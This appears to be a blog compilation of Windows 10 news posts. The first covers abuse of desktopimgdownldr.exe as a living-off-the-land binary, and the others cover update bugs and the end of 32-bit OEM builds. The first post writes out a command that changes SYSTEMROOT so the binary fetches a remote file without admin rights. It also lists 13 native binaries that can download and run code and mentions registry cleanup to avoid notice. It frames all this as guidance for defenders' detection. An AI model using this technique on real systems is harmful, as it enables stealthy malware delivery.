Windows 10 Background image tool… Cause a Security issues

A binary in Windows 10 responsible for setting an image for the desktop and lock screen can help attackers download malware on a compromised system without raising the alarm.

Known as living-off-the-land binaries (LoLBins), these files come with the operating system and have a legitimate purpose. Attackers of all colors are abusing them in post-exploitation phases to hide malicious activity.

The new LoL in the Bin
An attacker can use LoLBins to download and install malware, bypass security controls such as UAC or WDAC. Typically, the attack involves fileless malware and reputable cloud services.

A list of 13 Windows native executables that can download and execute malicious code:

powershell.exe
bitsadmin.exe
certutil.exe
psexec.exe
wmic.exe
mshta.exe
mofcomp.exe
cmstp.exe
windbg.exe
cdb.exe
msbuild.exe
csc.exe
regsvr32.exe

The executable is part of the Personalization CSP (configuration service provider) that allows, among others, defining the lock screen and desktop background images.

In both cases, the setting accepts JPG, JPEG, PNG files that are stored locally or remotely (supports HTTP/S URLs).

Running desktopimgdownldr.exe with administrator privileges overrules the user-defined lock screen image, alerting of something suspicious.

This can be avoided, though, if the attacker deletes a registry value immediately after running executing the binary, leaving the user none the wiser.

Executable appears to require high privileges (admin) so that it can create files in C:\Windows and in the registry, it can also run as a standard user to download files from an external source.

This is possible by changing the location of the %systemroot% environment variable before executing the binary. This results in modifying the download destination and bypassing access checks.

set “SYSTEMROOT=C:\Windows\Temp” && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Without administrator rights, writing to the registry is not possible, so the lock screen image remains unchanged. In this scenario, the method creates no other artifacts than the downloaded file.

Executable uses BITS COM Object to download a file and on some machines it tries to locate the COM+ Registration Catalog in the %systemroot% location. Since the attacker changes the environment variable, the attempt fails.

Users of Endpoint Detection and Response solutions to add “desktopimgdownldr.exe” to their queries and watchlists and treat it just like “certutil.exe,” a widely used LoLBin, by both advanced hackers doing a government’s bidding and cybercriminals set on scoring big money.

Windows 10 2004 … Its again erroneous

It’s been exactly a month Windos 10 2004 released. It has cool features but still it’s erroneous a bit… Struggling a little to cop up ..

Windows 10 version 2004, which was released on May 27, is currently available for seekers or those who manually check for updates in Windows Updates settings.

In addition to new features, Windows 10 version 2004 (May 2020 Update) also comes with improvements to block potentially unwanted programs, also known short PUPs and PUAs, from showing up on your system or being installed on Windows PCs.

Windows 10 May 2020 Update allows you to maintain a track of the potentially unwanted programs and prevent from being downloaded or installed on Windows 10 systems.

The Potentially Unwanted Programs or Potential Unwanted Programs come included in various types of software bundling and driver or registry optimizer.

After applying May 2020 Update, users are reporting that Windows Security app triggers security threat alerts even when the PUA file is gone. After the PUA has been removed or allowed to run on Windows 10, later scans of Windows Security are detecting the old items again, causing an erroneous detection loop.

It appears that Windows Defender has been defaulted to identify PUPs as a threat in Windows 10 version 2004. After the PUP has been removed, Windows Defender identities the same file again and again as a threat on the subsequent scans of the history.

To fix PUP and PUA warnings in Windows Security app, you would need to delete PUPs history information by following these steps:

• Open File Explorer.
• Navigate to C:ProgramData–> Microsoft–>Windows Defender–>ScansHistory Service
• In the Service folder, delete PUP related files.
• Restart Windows and do a quick scan in Windows Security app.


The notifications for PUPs won’t show up again until another PUP file is loaded on your system.

It’s not yet clear whether Microsoft is aware of the reports, but a fix could be planned as the issue has been widely reported by affected users on Microsoft’s answers forum.

The post Windows 10 version 2004 bug triggers repeated security alerts appeared first on Windows Latest

Windows 10 2004 OS update issues

The Windows 10 May 2020 update was released about a week ago but only to a select group of laptops that aren’t affected by known bugs. Everyone else will encounter a notification informing them that they can’t upgrade their system to Windows 10 version 2004.

This restriction also applies to users whose laptops and desktops use Intel Optane memory, a module that caches your most used programs, videos and docs so you can quickly access them. While laptops with Optane won’t automatically update to the latest Windows version, several users have forced the update through the Media Creation Tool and are now complaining about a compatibility error.

“Unable to load DLL ‘iaStorAfsServiceApi.dll’: The specified module could not be found. (Exception from HRESULT: 0x8),” the message reads.

During the update process, Windows 10 removes an Optane Memory Pinning file from the device, which leads to problems when it tries to run it. As Windows Latest points out, testers uncovered the compatibility issue months ago and reported it in the Feedback Hub.

“This is a problem because Optane Memory Pinnings should have been moved to the new update, but the files were not, but it is still in the Windows Installer Database. I am unable to remove it because the files and uninstallers themselves are gone and now Windows tries to launch a program with .dlls that do not exist,” one person wrote.

It’s possible the complaint sneaked past Microsoft or the company was busy trying to fix other widespread issues that it didn’t have time to tackle the Optane problem. Whatever the case, users who own laptops with Optane memory should wait for Microsoft to patch the compatibility bug before downloading the May 2020 Update.

How to Proceed

If you’ve manually forced the update onto your machine and are experiencing problems — related to Optane or otherwise — your best bet is to revert to an earlier version of the operating system.

To do so, search “Update” in Windows Search and choose “Check for Updates.” Select “Update History” toward the button of the screen then “Uninstall updates.” From this page, find Windows 10 version 2004.

You can also try disabling Optane memory from the device manager. Go to the Control Panel and find Programs and Features. From here, right-click Intel Optane Pinning Explorer Extensions and choose “Uninstall.”

Microsoft soon ditch Windows 32bit OS

Death of Windows 10 32-bit may be looming as Microsoft ends support for new PCs

The next major Windows 10 update is set to mean big changes for PC makers concerning the versions of software they can offer.

Windows 10 May 2020 Update, which is due late in May, will drop support for the 32-bit version of the operating system on the OEM side.

In other words, as of the next big update, hardware manufacturers will no longer be offered 32-bit versions of Windows 10 to install on their devices, and any PC made going forward will have a 64-bit installation.

This isn’t a great surprise, really, and pretty much an expected move from Microsoft. If you look at the number of folks out there actually running Windows 10 32-bit, it’s an extremely small percentage (one fifth of a percent, looking at the most recent Steam hardware survey as an example). And the number of new PCs running a 32-bit version is doubtless even smaller…

Don’t press the panic button

That said, before those with old PCs, or folks who are running the 32-bit spin on Windows 10 for legacy reasons, start to panic, Microsoft will still continue to support existing 32-bit installations of the operating system going forward.

Microsoft clarified: “This does not impact 32-bit customer systems that are manufactured with earlier versions of Windows 10; Microsoft remains committed to providing feature and security updates on these devices, including continued 32-bit media availability in non-OEM channels to support various upgrade installation scenarios.”

However, with Windows 10 32-bit being phased out as of the May 2020 Update, it’s clearly on the path to complete extinction now. And as to how long Microsoft feels it’s viable to continue providing updates for existing 32-bit systems, that’s an unknown factor – we’ll just have to see. But as we’ve already mentioned, the percentage of users out there is already vanishingly tiny, and at some point, a decision might be made about the use of resources in continuing that support.